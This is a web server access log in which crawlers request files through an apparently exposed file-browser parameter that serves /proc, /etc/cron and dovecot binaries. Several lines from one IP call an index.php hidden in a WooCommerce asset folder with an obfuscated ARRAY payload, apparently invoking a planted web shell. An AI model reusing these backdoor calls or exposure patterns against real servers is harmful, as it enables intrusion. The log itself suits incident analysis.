216.73.216.122 - - [02/Aug/2026:02:02:12 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-cg-64%2Fpartial&path=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-cg-64 HTTP/1.1" 200 2733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:02:14 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory4/subsystem/drivers HTTP/1.1" 200 2873 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory4/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:02:15 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-192%2Fusersize&path=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-192 HTTP/1.1" 200 2736 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:02:17 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory1/subsystem/devices HTTP/1.1" 200 4926 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory1/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:02:18 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-cg-64%2Fusersize&path=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-cg-64 HTTP/1.1" 200 2734 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:02:20 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory0/subsystem/devices HTTP/1.1" 200 4925 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory0/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:02:21 +0200] "GET /?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-6.8.0-90%2Fkernel%2Fbpf%2FMakefile&path=%2F%2Fusr%2Fsrc%2Flinux-headers-6.8.0-90%2Fkernel%2Fbpf HTTP/1.1" 200 3435 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:02:24 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory2/subsystem/devices HTTP/1.1" 200 4922 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory2/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
94.136.190.175 - - [02/Aug/2026:02:00:03 +0200] "GET /wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-images-field/product-images-field/index.php?ARRAY=7o2230223n313738353633323430332p2231223n22687474703n5p2s5p2s7n733030387631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738353632383830332q6236663962333834346432623737326334303566303164643565343137643164222p2232223n226437653765633366623434656566636464326637646161613335393530393433222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34392q35342q36392q38302q38352q3136227q HTTP/1.1" 200 236 "-" "-"
216.73.216.122 - - [02/Aug/2026:02:02:24 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-192%2Fcpu_partial&path=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-192 HTTP/1.1" 200 2738 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:02:27 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory2/subsystem/drivers HTTP/1.1" 200 2870 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory2/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:02:27 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-cg-64%2Fcpu_partial&path=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-cg-64 HTTP/1.1" 200 2736 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:02:30 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory4/subsystem/drivers HTTP/1.1" 200 2872 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory4/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:02:30 +0200] "GET /?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-6.8.0-90%2Fkernel%2Fcgroup%2FMakefile&path=%2F%2Fusr%2Fsrc%2Flinux-headers-6.8.0-90%2Fkernel%2Fcgroup HTTP/1.1" 200 2910 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.122 - - [02/Aug/2026:02:02:33 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-192%2Ftotal_objects&path=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-192 HTTP/1.1" 200 2740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:02:33 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory2/subsystem/drivers HTTP/1.1" 200 2870 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory2/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:02:36 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-cg-64%2Ftotal_objects&path=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-cg-64 HTTP/1.1" 200 2738 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:02:36 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory0/subsystem/drivers HTTP/1.1" 200 2872 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory0/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:02:39 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-192%2Fobjects&path=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-192 HTTP/1.1" 200 2735 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:02:39 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory3/subsystem/devices HTTP/1.1" 200 4927 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory3/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:02:42 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-cg-64%2Fobjects&path=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-cg-64 HTTP/1.1" 200 2734 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:02:42 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory2/subsystem/drivers HTTP/1.1" 200 2870 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory2/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:02:45 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-192%2Fobjects_partial&path=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-192 HTTP/1.1" 200 2741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:02:46 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory4/subsystem/devices HTTP/1.1" 200 4927 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory4/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
94.136.190.175 - - [02/Aug/2026:02:00:26 +0200] "GET /wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-images-field/product-images-field/index.php?ARRAY=7o2230223n313738353633323432362p2231223n22687474703n5p2s5p2s7n733030387631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738353632383832362q3237623663626262316337656137393237356663343562373035626537383436222p2232223n226437653765633366623434656566636464326637646161613335393530393433222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34392q35342q36392q38302q38352q3136227q HTTP/1.1" 200 236 "-" "-"
74.7.241.10 - - [02/Aug/2026:02:02:49 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory6/subsystem/drivers HTTP/1.1" 200 2873 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory6/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:02:50 +0200] "GET /?path=%2F%2Fsys%2Fdev%2Fblock%2F7%3A3%2Fpower HTTP/1.1" 200 3362 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:02:52 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory4/subsystem/devices HTTP/1.1" 200 4926 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory4/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:02:52 +0200] "GET /?path=%2F%2Fproc%2F3021813%2Fattr HTTP/1.1" 200 3323 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:02:55 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory3/subsystem/drivers HTTP/1.1" 200 2873 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory3/subsystem" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:02:55 +0200] "GET /?fileloc=%2F%2Fsys%2Fmodule%2Ffloppy%2Finitstate&path=%2F%2Fsys%2Fmodule%2Ffloppy HTTP/1.1" 200 2727 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:02:58 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory5/power HTTP/1.1" 200 3467 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory5" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:02:58 +0200] "GET /?fileloc=%2F%2Fsys%2Fmodule%2Fraid1%2Fsections%2F.init.text&path=%2F%2Fsys%2Fmodule%2Fraid1%2Fsections HTTP/1.1" 200 2730 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.122 - - [02/Aug/2026:02:03:01 +0200] "GET /?path=%2F%2Fproc%2F3021535%2Fattr HTTP/1.1" 200 3323 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:03:01 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory2/power HTTP/1.1" 200 3467 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:03:04 +0200] "GET /?fileloc=%2F%2Fsys%2Fbus%2Fnode%2Fdevices%2Fnode0%2Fmemory21%2Fvalid_zones&path=%2F%2Fsys%2Fbus%2Fnode%2Fdevices%2Fnode0%2Fmemory21 HTTP/1.1" 200 2756 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:03:05 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory2/power HTTP/1.1" 200 3467 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:03:07 +0200] "GET /?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fecryptfs_headers%2Fvalidate&path=%2F%2Fsys%2Fkernel%2Fslab%2Fecryptfs_headers HTTP/1.1" 200 2733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:03:08 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory4/power HTTP/1.1" 200 3469 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory4" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
94.136.190.175 - - [02/Aug/2026:02:00:48 +0200] "GET /wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-images-field/product-images-field/index.php?ARRAY=7o2230223n313738353633323434382p2231223n22687474703n5p2s5p2s7n733030387631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738353632383834382q3839363230373861356437326237623334303665613762313130326534636136222p2232223n226437653765633366623434656566636464326637646161613335393530393433222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34392q35342q36392q38302q38352q3136227q HTTP/1.1" 200 236 "-" "-"
216.73.216.122 - - [02/Aug/2026:02:03:10 +0200] "GET /?path=%2F%2Fetc%2Fcron.hourly HTTP/1.1" 200 3126 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:03:11 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory4/power HTTP/1.1" 200 3469 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory4" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:03:13 +0200] "GET /?path=%2F%2Fetc%2Fcron.daily HTTP/1.1" 200 3368 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:03:14 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory6/power HTTP/1.1" 200 3469 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory6" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:03:16 +0200] "GET /?fileloc=%2F%2Fusr%2Finclude%2Fx86_64-linux-gnu%2Fasm%2Fmsgbuf.h&path=%2F%2Fusr%2Finclude%2Fx86_64-linux-gnu%2Fasm HTTP/1.1" 200 3213 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:03:17 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory2/power HTTP/1.1" 200 3467 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:03:20 +0200] "GET /?fileloc=%2F%2Flib%2Fdovecot%2Fhealth-check.sh&path=%2F%2Flib%2Fdovecot HTTP/1.1" 200 3282 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:03:20 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory0/power HTTP/1.1" 200 3468 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory21/node0/memory2/subsystem/devices/memory0" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:03:22 +0200] "GET /?fileloc=%2F%2Flib%2Fdovecot%2Flibdovecot-sieve.so.0.0.0&path=%2F%2Flib%2Fdovecot HTTP/1.1" 200 278893 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:03:23 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory3/power HTTP/1.1" 200 3469 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory52/node0/memory2/subsystem/devices/memory3" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:03:25 +0200] "GET /?fileloc=%2F%2Flib%2Fdovecot%2Flibdovecot-fts.so.0.0.0&path=%2F%2Flib%2Fdovecot HTTP/1.1" 200 39097 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:03:26 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory1/power HTTP/1.1" 200 3469 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory1" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:03:28 +0200] "GET /?fileloc=%2F%2Flib%2Fdovecot%2Flibdovecot-login.so.0.0.0&path=%2F%2Flib%2Fdovecot HTTP/1.1" 200 41603 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:03:29 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices/memory6 HTTP/1.1" 200 3507 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory48/node0/memory2/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:03:31 +0200] "GET /?fileloc=%2F%2Flib%2Fdovecot%2Fimap-urlauth-login&path=%2F%2Flib%2Fdovecot HTTP/1.1" 200 6911 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:03:33 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices/memory7 HTTP/1.1" 200 3508 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory59/node0/memory2/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
94.136.190.175 - - [02/Aug/2026:02:01:11 +0200] "GET /wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-images-field/product-images-field/index.php?ARRAY=7o2230223n313738353633323437312p2231223n22687474703n5p2s5p2s7n733030387631332r6269696p6p2r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313738353632383837312q3530663935323138393066333531653133303030356665393030323636323561222p2232223n226437653765633366623434656566636464326637646161613335393530393433222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34392q35342q36392q38302q38352q3136227q HTTP/1.1" 200 236 "-" "-"
216.73.216.122 - - [02/Aug/2026:02:03:34 +0200] "GET /?fileloc=%2F%2Flib%2Fdovecot%2Flibdovecot-fts.so.0&path=%2F%2Flib%2Fdovecot HTTP/1.1" 200 39097 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:03:36 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices/memory0 HTTP/1.1" 200 3507 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory71/node0/memory2/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:03:37 +0200] "GET /?fileloc=%2F%2Flib%2Fdovecot%2Flibdovecot-sieve.so.0&path=%2F%2Flib%2Fdovecot HTTP/1.1" 200 278931 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:03:39 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices/memory4 HTTP/1.1" 200 3506 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory34/node0/memory2/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:03:40 +0200] "GET /?fileloc=%2F%2Flib%2Fdovecot%2Flibdovecot-lda.so.0.0.0&path=%2F%2Flib%2Fdovecot HTTP/1.1" 200 14674 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.10 - - [02/Aug/2026:02:03:42 +0200] "GET /?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices/memory3 HTTP/1.1" 200 3507 "https://jacket.sopnonill.store/?path=//sys/bus/node/devices/node0/memory2/subsystem/devices/memory15/node0/memory2/subsystem/devices" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.122 - - [02/Aug/2026:02:03:43 +0200] "GET /?fileloc=%2F%2Flib%2Fdovecot%2Fimap-hibernate&path=%2F%2Flib%2Fdovecot HTTP/1.1" 200 15270 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
